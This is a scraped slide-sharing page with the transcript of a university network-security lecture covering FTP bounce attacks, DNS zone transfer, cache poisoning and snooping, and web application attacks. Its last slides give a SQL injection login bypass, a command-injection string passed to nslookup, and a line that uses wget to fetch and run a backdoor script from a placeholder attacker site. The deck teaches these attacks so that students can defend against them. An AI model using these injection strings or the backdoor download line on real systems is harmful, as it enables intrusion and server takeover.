application layer security n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Application Layer Security PowerPoint Presentation
Download Presentation
Application Layer Security

Loading in 2 Seconds...

play fullscreen
1 / 70

Application Layer Security - PowerPoint PPT Presentation


  • 338 Views
  • Uploaded on

Application Layer Security. Lecture 8 Supakorn Kungpisdan supakorn@mut.ac.th. Outline. FTP Security DNS Security Web Application Security. FTP Security Issues. All traffic is transmitted in clear text Weak configuration on FTP allows brute force and dictionary attacks

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

Application Layer Security


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
    Presentation Transcript
    1. Application Layer Security Lecture 8 Supakorn Kungpisdan supakorn@mut.ac.th NETE4630

    2. Outline • FTP Security • DNS Security • Web Application Security NETE4630

    3. FTP Security Issues • All traffic is transmitted in clear text • Weak configuration on FTP allows brute force and dictionary attacks • Anonymous access may be enabled to FTP server • If file permissions are not set, an anonymous user may be able to read, overwrite, or delete files, leading to loss of confidentiality, integrity, and availability of data • If anonymous access is being used on a server, make sure that the proper restrictions are enforced for this user NETE4630

    4. Active FTP • The client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21. The client also sends the FTP command PORT N+1 from port N to port 21 at the FTP server. The client then starts listening to port N+1 • Server returns the response from port 21 to port N at the client • The server will then connect back to the client's specified data port from its local data port (port 20) to the client at port N+1 Ref: http://slacksite.com/other/ftp.html NETE4630

    5. Firewall VS Active FTP • From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened: • FTP server's port 21 from anywhere (Client initiates connection) • FTP server's port 21 to ports > 1023 (Server responds to client's control port) • FTP server's port 20 to ports > 1023 (Server initiates data connection to client's data port) • FTP server's port 20 from ports > 1023 (Client sends ACKs to server's data port) NETE4630

    6. Active FTP (cont.) debug Client port = (14*256)+178 = 3762 Letters in red shows client input Letters in black shows server output NETE4630

    7. Active FTP (cont.) • The client's command port contacts the server's command port (port 21) and sends the command PORT 1027 (N+1). • The server sends an ACK back from its port 21 to the client's command port (port 1026  port N). • the server initiates a connection on its local data port (port 20) to the data port the client specified earlier (port 1027). • The client sends an ACK back from port 1027 to the server port 20. NETE4630

    8. Problems of Active FTP • The FTP client doesn't make the actual connection to the data port of the server • The FTP client simply tells the server what port it is listening on (N+1) and waits for the server to connect back to the specified port on the client. • From the client-side firewall, this appears to be an outside system initiating a connection to an internal client • This connection may be blocked • Because the server initiates the data connection, the server may connects to different client NETE4630

    9. Passive FTP • To solve the problem of active FTP, use passive FTP • When opening an FTP connection, the client opens two random unprivileged ports locally (N>1023 and N+1). • The port N contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. • The server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client. • The client then initiates the connection from port N+1 to port P on the server to transfer data. NETE4630

    10. Firewall VS Passive FTP • From the server-side firewall's standpoint, to support passive FTP, the following communication channels need to be opened: • FTP server's port 21 from anywhere (Client initiates connection) • FTP server's port 21 to ports > 1023 (Server responds to client's control port) • FTP server's ports > 1023 from anywhere (Client initiates data connection to random port specified by server) • FTP server's ports > 1023 to remote ports > 1023 (Server sends ACKs (and data) to client's data port) NETE4630

    11. Passive FTP (cont.) Server specifies port number NETE4630

    12. Passive FTP • The client contacts the server on the command port (port N=1026) and issues the PASV command. • The server then replies with PORT 2024, telling the client which port it is listening to for the data connection. • The client then initiates the data connection from its data port (N+1=1027) to the specified server data port (port 2024). • The server sends back an ACK (from its port 2024) to the client's data port (port 1027). You can see that client initiates data connection with FTP server  will not be blocked by the firewall NETE4630

    13. Problems of Passive FTP • The FTP server needs to allow remote connection to high numbered ports on the server. • Fortunately, many FTP daemons, including the popular WU-FTPD allow the administrator to specify a range of ports which the FTP server will use. • Some FTP clients do (or do not) support passive mode. NETE4630

    14. FTP Bounce Scan • The FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station. • With passive FTP, a user could send a PORT command to an FTP server that would direct the data towards a completely different host! • The FTP bounce attack takes advantage of these poorly-configured FTP servers (no control over ranges of FTP ports) • The data is BOUNCED from FTP server to target host NETE4630

    15. FTP Bounce Scan (cont.) Closed port Open port NETE4630

    16. Advantages of FTP Bounce Scan • FTP bounce attack can scan "through" a firewall. • The FTP bounce attack uses standard FTP functionality. Nmap does not require specialized packet configurations or changes to the FTP protocol. • Therefore, the FTP bounce attack does not require any privileged access. NETE4630

    17. Disadvantages of FTP Bounce Scan • FTP bounce attack relates to the availability of an FTP server that allows a PORT command to redirect the data connection to a third device. • Most FTP servers have their default configuration to protect against this use of the PORT command NETE4630

    18. Other FTP Bounce Attack • When using active FTP, a client uses the PORT command to specify the IP address and port number that the server should connect to for data connection • An attacker with access to an FTP server can bounce through the server by specifying someone else’s IP address NETE4630

    19. Outline • FTP Security • DNS Security • Web Application Security NETE4630

    20. Domain Name System • DNS is a distributed database that holds information for mapping between host names to IP addresses • DNS uses both UDP and TCP. • UDP is typically used for queries, unless the lookup or response is greater than 512 bytes • TCP is used for lookups and for zone transfer • Integrity and availability of DNS is critical for the health of the Internet. It is used in conjunction with almost every other protocol on the Internet • Availability was considered while designing DNS, however, security was not NETE4630

    21. DNS Request NETE4630

    22. DNS Response NETE4630

    23. DNS Lookup Process 1 2 Host A’s Authoritative name server Host A • Host A sends a request to resolver (at host A). It checks the local cache and may check hosts file • The resolver at Host A forwards the request to its authoritative name server NETE4630

    24. DNS Non-recursive Query 1 Host A’s Authoritative name server 2 3 Host B’s Authoritative name server 4 Host A Host B 5 3. Find the address of authoritative name server of the requested domain and returns its address to the resolver NETE4630

    25. DNS Recursive Query 1 Host A’s Authoritative name server 2 5 Host B’s Authoritative name server 3 Host A Host B 4 3. The server finds the address of authoritative name server of the requested domain, passes the request on to the server, and returns a response to the resolver NETE4630

    26. DNS Hierarchy (Recursive Query) .com TLD server 5 4 3 6 7 2 What happens if (2) is recursive query? 1. Recursive query 2. non-recursive query 1 8 NETE4630

    27. DNS Utilities • Most OSes come with a tool called nslookup, capable of querying DNS servers for various types of information • The dig tool coming with UNIX has similar capabilities NETE4630

    28. Name-to-IP Lookup NETE4630

    29. MX Lookup with nslookup NETE4630

    30. DNS Security Issues • DNS is lack of authentication and integrity checking • Due to the lack of authentication, attackers can spoof DNS messages to perform a variety of attacks • Due to the lack of integrity checking, attackers can intercept and modify messages in transit NETE4630

    31. DNS Zone Transfer • For redundancy, administrators deploy both primary and secondary name servers that contain the same DBs • To keep the DBs synchronized with the primary name server, the secondary name server periodically connects to the primary name server on port 53/TCP and grabs the DNS records • This process is called a Zone Transfer NETE4630

    32. DNS Information Gathering • DNS can provide a great deal of information about the target network and its hosts • One of the common insecure configurations with DNS is allowing anyone to perform zone transfers on one of a domain’s DNS servers • If an attacker can perform a zone transfer with the primary or secondary name servers for a domain, he/she will be able to view all DNS records for that domain • See a demo at http://www.mindterra.com/blog/?p=179 • Solved by specifying IP address that is allowed to perform the zone transfer or using Transaction Signature (TSIG) NETE4630

    33. DNS Cache Poisoning • Both DNS client and servers cache responses for a period of time in order to increase performance and reduce network traffic • If an attacker can spoof a response for a DNS request, he/she may be able to contaminate the DNS cache with an incorrect record • This process is known as DNS cache poisoning • The only real defense built into DNS is the use of a randomTransaction ID and source port • Some versions of BIND use Transaction IDs that are not sufficiently random, and some use sequential Transaction IDs • BIND 9 Cache Poisoning NETE4630

    34. DNS Cache Poisoning (cont.) • Attacker sends a large number of recursive requests for www.syngress.com to ns.hackthestack.com • ns.hackthestack.com forwards the requests to other name servers until it eventually sends the requests to Syngress’s name server ns.syngress.com • The ns.hackthestack.com is expecting to receive a large number of replies from ns.syngress.com. • Before they arrive, the attacker could flood ns.hackthestack.com with a large number of packets spoofed from ns.syngress.com • The attack will be successful if the spoofed packets have the correct combination of TID and port number NETE4630

    35. DNS Cache Snooping • Recursion bit tells the DNS server whether it is recursive or non-recursive query • The remote DNS server may answer to queries for 3rd party domains which do not have the recursion bit set. • This may allow a remote attacker to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited. Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf NETE4630

    36. Possible Scenario • If an attacker was interested in whether your company utilizes the online services of a particular bank, they can use this attack to build a statistical model regarding company usage of the bank mentioned above. • This attack can also be used to find B2B partners, web-surfing patterns, external mail servers, and more... • Two techniques are available: using non-recursive queries and using recursive queries • Some DNS allows both types of queries, but some allows only recursive queries to be made NETE4630

    37. DNS Cache Snooping with Non-recursive Queries Attacker queries to ns1.tvcabo.pt for www.sidestep.pt ns1.tvcabo.pt does not have the entry in local cache. It returns no answer, but gives a list of .pt TLD name server for further question NETE4630

    38. DNS Cache Snooping with Non-recursive Queries (cont.) • The fact that ns1.tvcabo.pt does not have the entry in local cache means that all hosts under ns1.tvcabo.pt never communicates with www.sidestep.pt before. • Thus, this organization does not use services provided by www.sidestep.pt NETE4630

    39. DNS Cache Snooping with Non-recursive Queries (cont.) • If the attacker executes the same query, check the response For this time, ns1.tvcabo.pt caches the entry, so it returns the answer NETE4630

    40. DNS Cache Snooping with Recursive Queries • Used to determine with some degree of precision (not 100% sure) whether a given record is present in the cache • However, this will pollute the cache • If a given record is not present in the cache, it will be after the first query is made • This is because recursive query will always return the answer for the given record NETE4630

    41. DNS Cache Snooping with Recursive Queries • Try to see if www.sidestep.pt was cached in ns1.tvcabo.pt • Query ns1.tvcabo.pt for www.sidestep.pt and record the TTL NETE4630

    42. DNS Cache Snooping with Recursive Queries (cont.) • Then query to ns.sidestep.pt (Sidestep.com’s authoritative DNS) for www.sidestep.com and compare TTL NETE4630

    43. DNS Cache Snooping with Recursive Queries (cont.) • TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is much lower than the initial TTL (86400) (the TTL at ns.sidestep.pt) • This is a good indicator that the answer was already cached at ns1.tvcabo.pt • Another way to look for cached responses is to observe the time that the query takes to process. • If the query time is approximately equal to the round trip time (RTT) of a packet to the server, then the answer might have been already present in the cache. NETE4630

    44. A Safer BIND Configuration NETE4630

    45. Outline • FTP Security • DNS Security • Web Application Security NETE4630

    46. Attacking Web Applications • The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data • This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server S. Kungpisdan

    47. SQL Injection • Many web applications rely on backend DBs for information storage and retrieval. • Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters • Consider the following: • Query = “SELECT * FROM users WHERE username = ‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”; • “SELECT * FROM users WHERE username = ‘bob’ AND password = ‘ ’ OR 1=1 ’’; S. Kungpisdan

    48. Code Injection • Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments • Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility S. Kungpisdan

    49. Code Injection (cont.) • If supply ;ls –la/, the script will execute the command nslookup;ls –la/, resulting in a listing of the root directory being printed out S. Kungpisdan

    50. Code Injection (cont.) • wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script • ;wget http://attackersite/backdoor.pl;perl backdoor.pl S. Kungpisdan